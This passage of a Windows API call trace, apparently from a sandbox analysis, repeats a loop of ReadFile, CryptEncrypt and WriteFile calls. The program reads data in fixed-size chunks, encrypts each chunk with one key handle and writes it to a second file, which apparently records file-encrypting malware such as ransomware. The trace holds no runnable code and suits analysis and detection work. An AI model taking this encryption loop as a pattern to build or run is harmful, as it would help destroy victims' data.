pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.696] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.696] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.696] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.696] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.697] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.697] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.698] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.698] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.698] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.698] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.698] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.698] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.698] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.699] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.699] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.699] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.699] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.699] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.699] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.700] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.701] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.702] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.702] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.702] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.702] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.702] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.702] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.702] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.702] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.703] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.703] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.703] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.703] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.704] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.704] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.704] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.704] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.704] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.704] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.704] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.705] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.705] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.705] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.705] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.705] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.706] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.706] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.706] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.706] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 